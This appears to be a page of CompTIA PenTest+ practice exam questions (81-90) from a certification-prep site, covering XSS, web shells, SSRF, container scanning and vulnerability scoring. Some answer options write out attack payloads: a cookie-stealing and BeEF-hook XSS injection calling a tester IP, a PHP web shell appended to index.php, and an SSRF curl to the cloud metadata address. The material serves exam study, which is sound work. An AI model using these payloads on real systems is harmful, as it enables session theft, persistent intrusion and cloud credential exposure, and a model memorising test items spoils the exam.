Summer Certification Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 9 out of 10 pages
Viewing questions 81-90 out of questions
Questions # 81:

During a penetration test, a tester has confirmed stored XSS within a comment form on a site. Which of the following payloads is required to exploit the vulnerability and provide a reverse shell against user browsers?

Options:

A.

Use Evilginx and insert payload < img src= " http:// < tester-IP > /?f ' document.cookie+ ' "


B.

Use BeEF and insert payload < script src= " http:// < tester-IP > :3000/hook.js " >


C.

Use Netcat listener and insert payload < iframe src=http:// < tester-IP > /../../bin/bash >


D.

Use Metasploit post/firefox/gather/xss and insert payload < img src= " http:// < tester-IP > "


Expert Solution
Questions # 82:

During a security assessment, a penetration tester wants to compromise user accounts without triggering IDS/IPS detection rules. Which of the following is the most effective way for the tester to accomplish this task?

Options:

A.

Crack user accounts using compromised hashes.


B.

Brute force accounts using a dictionary attack.


C.

Bypass authentication using SQL injection.


D.

Compromise user accounts using an XSS attack.


Expert Solution
Questions # 83:

A penetration tester obtains a reverse shell on a server and executes the following command on the compromised server:

echo ' < ?php system($_GET[ " c " ]); ? > ' > > /var/www/public/index.php

Which of the following best explains what the penetration tester is trying to do?

Options:

A.

Prevent detection.


B.

Circumvent controls.


C.

Move laterally.


D.

Establish persistence.


Expert Solution
Questions # 84:

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitability?

Options:

A.

curl < url > ?param=http://169.254.169.254/latest/meta-data/


B.

curl ' < url > ?param=http://127.0.0.1/etc/passwd '


C.

curl ' < url > ?param= < script > alert(1) < script > / '


D.

curl < url > ?param=http://127.0.0.1/


Expert Solution
Questions # 85:

A penetration tester is searching for vulnerabilities or misconfigurations on a container environment. Which of the following tools will the tester most likely use to achieve this objective?

Options:

A.

Nikto


B.

Trivy


C.

Nessus


D.

Nmap


Expert Solution
Questions # 86:

A penetration testing team needs to determine whether it is possible to disrupt the wireless communications for PCs deployed in the client ' s offices. Which of the following techniques should the penetration tester leverage?

Options:

A.

Port mirroring


B.

Sidecar scanning


C.

ARP poisoning


D.

Channel scanning


Expert Solution
Questions # 87:

A penetration tester cannot find information on the target company ' s systems using common OSINT methods. The tester ' s attempts to do reconnaissance against internet-facing resources have been blocked by the company ' s WAF. Which of the following is the best way to avoid the WAF and gather information about the target company ' s systems?

Options:

A.

HTML scraping


B.

Code repository scanning


C.

Directory enumeration


D.

Port scanning


Expert Solution
Questions # 88:

A penetration tester establishes a remote session to a host and receives the following prompt: rpcclient . Which of the following is the tester most likely able to do?

Options:

A.

Query local users on the system.


B.

Obtain SAM database password hashes.


C.

Enumerate session tokens.


D.

Change the Resultant Set of Group Policy applied in AD.


Expert Solution
Questions # 89:

A penetration tester is testing a power plant ' s network and needs to avoid disruption to the grid. Which of the following methods is most appropriate to identify vulnerabilities in the network?

Options:

A.

Configure a network scanner engine and execute the scan.


B.

Execute a testing framework to validate vulnerabilities on the devices.


C.

Configure a port mirror and review the network traffic.


D.

Run a network mapper tool to get an understanding of the devices.


Expert Solution
Questions # 90:

A penetration tester finishes a security scan and uncovers numerous vulnerabilities on several hosts. Based on the targets ' EPSS (Exploit Prediction Scoring System) and CVSS (Common Vulnerability Scoring System) scores, which of the following targets is the most likely to get attacked?

Options:

A.

Target 1: EPSS Score = 0.6, CVSS Score = 4


B.

Target 2: EPSS Score = 0.3, CVSS Score = 2


C.

Target 3: EPSS Score = 0.6, CVSS Score = 1


D.

Target 4: EPSS Score = 0.4, CVSS Score = 4.5


Expert Solution
Viewing page 9 out of 10 pages
Viewing questions 81-90 out of questions